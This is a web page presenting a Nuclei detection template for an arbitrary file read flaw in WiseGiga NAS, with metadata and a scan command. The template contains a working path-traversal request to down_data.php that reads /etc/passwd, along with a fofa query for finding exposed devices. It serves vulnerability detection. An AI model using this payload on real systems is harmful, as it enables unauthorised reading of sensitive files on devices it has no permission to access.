Skip to content

WiseGiga NAS - Arbitrary File Read

ID: wisegiga-nas-lfi

Severity: high

Author: pussycat0x

Tags: wisegiga,lfi,nas

WISEGIGA NAS down_data.php has an arbitrary file download vulnerability. Due to the lax filtering of the filename parameter on the /down_data.php page, sensitive system files can be read.

id: wisegiga-nas-lfi
info:
name: WiseGiga NAS - Arbitrary File Read
author: pussycat0x
severity: high
description: |
WISEGIGA NAS down_data.php has an arbitrary file download vulnerability. Due to the lax filtering of the filename parameter on the /down_data.php page, sensitive system files can be read.
reference:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/WiseGiga%20NAS%20down_data.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: app="WISEGIGA-NAS"
tags: wisegiga,lfi,nas
http:
- method: GET
path:
- "{{BaseURL}}/down_data.php?filename=../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "file/unknown"
- type: status
status:
- 200
# digest: 4b0a00483046022100c7170d5f672d7b1c2ce52de6b6fafc28cae161f2a0b18e4add01f17cd122f5910221009d397597c546f98adb73bb16eaf5aa202fb399885b7a3177bfa886731a639e85:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/wisegiga-nas-lfi.yaml"

View on Github